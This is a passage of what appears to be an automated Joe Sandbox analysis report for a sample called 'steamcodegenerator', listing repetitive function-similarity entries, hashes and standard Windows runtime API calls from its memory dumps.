                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiStringWide
                                                                        • String ID:
                                                                        • API String ID: 2829165498-0
                                                                        • Opcode ID: 56c1881ff080da115e17173811a025af0d6ab41ce3f93a68b9c841ae504a7f9c
                                                                        • Instruction ID: d7380e52afb709506c66245f08f35e080c9dcd4135146405fc083df66590d96c
                                                                        • Opcode Fuzzy Hash: 56c1881ff080da115e17173811a025af0d6ab41ce3f93a68b9c841ae504a7f9c
                                                                        • Instruction Fuzzy Hash: 1881DE33A09741C6EB288F21A44136A67A1FF94BA8F044631EA5DABBD5DF3DE4118741
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                        • String ID:
                                                                        • API String ID: 2081738530-0
                                                                        • Opcode ID: 5b1032962b2f3603510ee43495ab5f1e8501dba359fef9820ab2aefd96205ff8
                                                                        • Instruction ID: 26c7f5287ef6912eaec53df1428a1accc7335162073db386617b829b45912e18
                                                                        • Opcode Fuzzy Hash: 5b1032962b2f3603510ee43495ab5f1e8501dba359fef9820ab2aefd96205ff8
                                                                        • Instruction Fuzzy Hash: DC31A722A08B41C5EA19DF15E4461F97371FB44B94F484931EA4DAF7A6DF3CE561C700
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                        • String ID:
                                                                        • API String ID: 2081738530-0
                                                                        • Opcode ID: 6dd869cd8eb9f4e4568965f6fff9a5a75bd4238d98132b85c20296b06ff4c309
                                                                        • Instruction ID: ac4d96c2114a005c5e625a5e2bc8d69f0477f0b21713c5f70f09a33954098067
                                                                        • Opcode Fuzzy Hash: 6dd869cd8eb9f4e4568965f6fff9a5a75bd4238d98132b85c20296b06ff4c309
                                                                        • Instruction Fuzzy Hash: D3319221A09B42C5EB1D9B55E4422B967B0EF44BA4F084131DA1DEF7A6DE3CF462C300
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                        • String ID: csm$csm$csm
                                                                        • API String ID: 3523768491-393685449
                                                                        • Opcode ID: 56b501d46a3a8898814a296027c8e3984b73c41ebf1f0af9fd66e92a0995a612
                                                                        • Instruction ID: 40748445b2f894d0e599a36aa7f3981f755ba3494c1639d50c5112e333e2aa0e
                                                                        • Opcode Fuzzy Hash: 56b501d46a3a8898814a296027c8e3984b73c41ebf1f0af9fd66e92a0995a612
                                                                        • Instruction Fuzzy Hash: B8E19F72D08782CAEB68AB64D4822BD77B0FB44748F144135DA9DAB797DF38E4A5C700
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,00001E36F50DF55B,00007FF663554851,?,?,?,?,00007FF66355F7CA,?,?,00000000,00007FF663564803,?,?,?), ref: 00007FF66355A41F
                                                                        • FlsSetValue.KERNEL32(?,?,00001E36F50DF55B,00007FF663554851,?,?,?,?,00007FF66355F7CA,?,?,00000000,00007FF663564803,?,?,?), ref: 00007FF66355A455
                                                                        • FlsSetValue.KERNEL32(?,?,00001E36F50DF55B,00007FF663554851,?,?,?,?,00007FF66355F7CA,?,?,00000000,00007FF663564803,?,?,?), ref: 00007FF66355A482
                                                                        • FlsSetValue.KERNEL32(?,?,00001E36F50DF55B,00007FF663554851,?,?,?,?,00007FF66355F7CA,?,?,00000000,00007FF663564803,?,?,?), ref: 00007FF66355A493
                                                                        • FlsSetValue.KERNEL32(?,?,00001E36F50DF55B,00007FF663554851,?,?,?,?,00007FF66355F7CA,?,?,00000000,00007FF663564803,?,?,?), ref: 00007FF66355A4A4
                                                                        • SetLastError.KERNEL32(?,?,00001E36F50DF55B,00007FF663554851,?,?,?,?,00007FF66355F7CA,?,?,00000000,00007FF663564803,?,?,?), ref: 00007FF66355A4BF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: Value$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 2506987500-0
                                                                        • Opcode ID: d929618738324d574e70838d51b97b836a85079287c8504ecfb6e89faa6b9b66
                                                                        • Instruction ID: 2b5b6a09b41ac5b63a7499fefe67762e3c8f3207319f17da9e6db00f9426d73a
                                                                        • Opcode Fuzzy Hash: d929618738324d574e70838d51b97b836a85079287c8504ecfb6e89faa6b9b66
                                                                        • Instruction Fuzzy Hash: F7114A30E1C646C1FA55A7B6A55B03922B2AF887B0F044634E83EAF7D6DE6CB4018311
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                        • String ID: bad locale name
                                                                        • API String ID: 2967684691-1405518554
                                                                        • Opcode ID: fd94d111b3a5a71e05e2fbcb881251465dc0f2d8c786bed247c494bd29d02914
                                                                        • Instruction ID: 3c511013d291d06680aa384ff3f3810d02527c4653a1feacda172ae42e4f16dd
                                                                        • Opcode Fuzzy Hash: fd94d111b3a5a71e05e2fbcb881251465dc0f2d8c786bed247c494bd29d02914
                                                                        • Instruction Fuzzy Hash: 5E411722B09B41C9EB18DFA0D4922FC3374AF54748F048435DE4EBBB56EE38E6669344
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                        • API String ID: 4061214504-1276376045
                                                                        • Opcode ID: 559c3951bd7f50195cdf89802e038081bfbf684ad2b4d9a1a4895f21a508b9c3
                                                                        • Instruction ID: 2cfcc7558cee5039fb7df93d22ef8aa4d8f98fc509c91ad98d8997341a4b09ef
                                                                        • Opcode Fuzzy Hash: 559c3951bd7f50195cdf89802e038081bfbf684ad2b4d9a1a4895f21a508b9c3
                                                                        • Instruction Fuzzy Hash: CAF04F71B09B86D2FA149B26A8563796330EF867A1F541635D5AE9B3F4CF3CE0458700
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPointer
                                                                        • String ID:
                                                                        • API String ID: 1740715915-0
                                                                        • Opcode ID: fe0cf1a3f0e36931d8326c1fa5e43f68e623f8e1a1bba44f29af81dcaff10926
                                                                        • Instruction ID: c8d1adfe47460b3faea857520ce7878a3fa0e9429627573a3ba5850924cca2de
                                                                        • Opcode Fuzzy Hash: fe0cf1a3f0e36931d8326c1fa5e43f68e623f8e1a1bba44f29af81dcaff10926
                                                                        • Instruction Fuzzy Hash: 65B1B231A0E642C1EE6DAF16954227D63B4EF44B84F098435DE8DAF79BDE3CE4628340
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_exception_copy__std_exception_destroy
                                                                        • String ID:
                                                                        • API String ID: 1087005451-0
                                                                        • Opcode ID: e056fb752b00353b83d650d62f1f17403a3bacc8c07260b3d954efaf1a3d08a7
                                                                        • Instruction ID: c0622adb072e784821538721736d99ecd19cd323e621f45c6bededce172fd878
                                                                        • Opcode Fuzzy Hash: e056fb752b00353b83d650d62f1f17403a3bacc8c07260b3d954efaf1a3d08a7
                                                                        • Instruction Fuzzy Hash: 5D81C622F19B41C9FB14DBA5D4023EC3371AB557A8F448235DE5D6BB96EE38A1A1C340
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: _set_statfp
                                                                        • String ID:
                                                                        • API String ID: 1156100317-0
                                                                        • Opcode ID: c857c3327227c68747334663d00ca9331fa9479a74f52c20cdb4b2826f66a1e0
                                                                        • Instruction ID: 1a1d523273196000038be5a7f44f5ec8ac7e2ddc3fa7d8572b6dfbd5d9771c1e
                                                                        • Opcode Fuzzy Hash: c857c3327227c68747334663d00ca9331fa9479a74f52c20cdb4b2826f66a1e0
                                                                        • Instruction Fuzzy Hash: 1581B43291CA86C6F7338A39A45227A66B0AF55374F044331ED5EBB7A4DF3CB5818750
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: _set_statfp
                                                                        • String ID:
                                                                        • API String ID: 1156100317-0
                                                                        • Opcode ID: 160c9c08bfc40915d9b2f250b4fe9603e2aa0f10eb61f97881b22bd1a26b2934
                                                                        • Instruction ID: 4fe87fbfaf37129624e574888726dc6f73a7320ea5e3fb9df177d06fe5c8aa37
                                                                        • Opcode Fuzzy Hash: 160c9c08bfc40915d9b2f250b4fe9603e2aa0f10eb61f97881b22bd1a26b2934
                                                                        • Instruction Fuzzy Hash: A3118E33E18A1282FA94112AE4473791170AF6B374E4A0230E56EFF3F7CE6CB8414216
                                                                        APIs
                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF663551CE7,?,?,00000000,00007FF663551F82,?,?,?,?,?,00007FF663551F0E), ref: 00007FF66355A4F7
                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF663551CE7,?,?,00000000,00007FF663551F82,?,?,?,?,?,00007FF663551F0E), ref: 00007FF66355A516
                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF663551CE7,?,?,00000000,00007FF663551F82,?,?,?,?,?,00007FF663551F0E), ref: 00007FF66355A53E
                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF663551CE7,?,?,00000000,00007FF663551F82,?,?,?,?,?,00007FF663551F0E), ref: 00007FF66355A54F
                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF663551CE7,?,?,00000000,00007FF663551F82,?,?,?,?,?,00007FF663551F0E), ref: 00007FF66355A560
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        • Opcode ID: f3e7b6d242c1910f2b5591a4fcee400abd11717328fc635c98f7e7c632fcba31
                                                                        • Instruction ID: 0b5610c29fbf9df3f8543b6d12fce87a31fdec55711e20d9b79223eb8d90be04
                                                                        • Opcode Fuzzy Hash: f3e7b6d242c1910f2b5591a4fcee400abd11717328fc635c98f7e7c632fcba31
                                                                        • Instruction Fuzzy Hash: 89113A30F18242C1FE59AB36A55757922769F847B0F544234E96EAF7D6DE2CF4028311
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        • Opcode ID: bd49efac836a00a7d6e6040a8177aeef1eacb3bc0844a01248e3808e30053e11
                                                                        • Instruction ID: 2bebc559f27e680f4b2ea2d244138dacf30febf3ecd6d066f1e67ff871a42fff
                                                                        • Opcode Fuzzy Hash: bd49efac836a00a7d6e6040a8177aeef1eacb3bc0844a01248e3808e30053e11
                                                                        • Instruction Fuzzy Hash: 18114530E19206C6F96AA6B6441707E26729F44374F584734DC3EEF3D2EE2CB4428321
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: CallEncodePointerTranslator
                                                                        • String ID: MOC$RCC
                                                                        • API String ID: 3544855599-2084237596
                                                                        • Opcode ID: 28528c47c0e47c61ea15e7d98c52d1fdbb12d4762e0c8dcc68e2cea472630b6c
                                                                        • Instruction ID: a57b7baca7f60bf6660a7e261bc5e2401008e9a8f38c9c253150123810d928c1
                                                                        • Opcode Fuzzy Hash: 28528c47c0e47c61ea15e7d98c52d1fdbb12d4762e0c8dcc68e2cea472630b6c
                                                                        • Instruction Fuzzy Hash: 8491A073A08B81DAE754DB64E8412AD7BB0FB45788F10413AEA8DAB756DF38D165C700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                        • String ID: csm
                                                                        • API String ID: 2395640692-1018135373
                                                                        • Opcode ID: efb476289a48de47cc6c133713b57c80aca7b2cc6583d7a462300b28a4b57851
                                                                        • Instruction ID: 09853f627164a6ee7866aa8b2c02fcbfbafbe8f941c5bae3ee81eaff1066ac75
                                                                        • Opcode Fuzzy Hash: efb476289a48de47cc6c133713b57c80aca7b2cc6583d7a462300b28a4b57851
                                                                        • Instruction Fuzzy Hash: 8051C232B19602CADB98CB15E445A7C73B5EB44B89F128131EA4A9B78ADF3DE851C700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: CallEncodePointerTranslator
                                                                        • String ID: MOC$RCC
                                                                        • API String ID: 3544855599-2084237596
                                                                        • Opcode ID: 8ff30341cfee721db4765e122103f5437cfdd667779e7ccbcb0684ed890b6ecf
                                                                        • Instruction ID: 4b19d21e7f41261b900a46ccf15df182fb74a1e6f0f93936edbc233fcf859cad
                                                                        • Opcode Fuzzy Hash: 8ff30341cfee721db4765e122103f5437cfdd667779e7ccbcb0684ed890b6ecf
                                                                        • Instruction Fuzzy Hash: D461A032908B85D1D7649B15E4413AEB7B0FB85B94F044235EB9CABB5ADF7CD1A4CB00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                        • String ID: csm$csm
                                                                        • API String ID: 3896166516-3733052814
                                                                        • Opcode ID: d1a409f6a23794f2edf1c37610bd8a1d13082c0ad3cb85bcd98522ffa63453bc
                                                                        • Instruction ID: 8fda3a03c6aa7736f4f4861e210acfece2663d65530cb064a75b322df3b3c55c
                                                                        • Opcode Fuzzy Hash: d1a409f6a23794f2edf1c37610bd8a1d13082c0ad3cb85bcd98522ffa63453bc
                                                                        • Instruction Fuzzy Hash: 96519072D08282D6EB788F25954636877B0EB84B94F148135DA9DABBDACF3CE474C700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                        • String ID: bad locale name
                                                                        • API String ID: 2775327233-1405518554
                                                                        • Opcode ID: 00736578c6eb0824a3dbfeb00187506f444d3a2b9fb46ce52c71a5bb71dfef5f
                                                                        • Instruction ID: a37206dc75e84f3db6ea98d1b027782b7aff179f3829a377d20b8f85267f15c6
                                                                        • Opcode Fuzzy Hash: 00736578c6eb0824a3dbfeb00187506f444d3a2b9fb46ce52c71a5bb71dfef5f
                                                                        • Instruction Fuzzy Hash: 2341E932B0AA41C9EF18DFA1D4922FC3374AF44758F084875DA4DABB56DE38E526D344
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                        • String ID:
                                                                        • API String ID: 2718003287-0
                                                                        • Opcode ID: 5c4401886065423c6ff0b2da39cbcb580a1fa276b42842d1cd99b8de723316d1
                                                                        • Instruction ID: 015bffab2a585b077191769a75278efd8ca86894d6b1f0b7819618739d56cd32
                                                                        • Opcode Fuzzy Hash: 5c4401886065423c6ff0b2da39cbcb580a1fa276b42842d1cd99b8de723316d1
                                                                        • Instruction Fuzzy Hash: 61D1BD32F08A81C9E711CB65D4412AC37B1EB55BA8B548236DE5EEBB99DF38E506C700
                                                                        APIs
                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF66355D3AF), ref: 00007FF66355D4E0
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF66355D3AF), ref: 00007FF66355D56B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
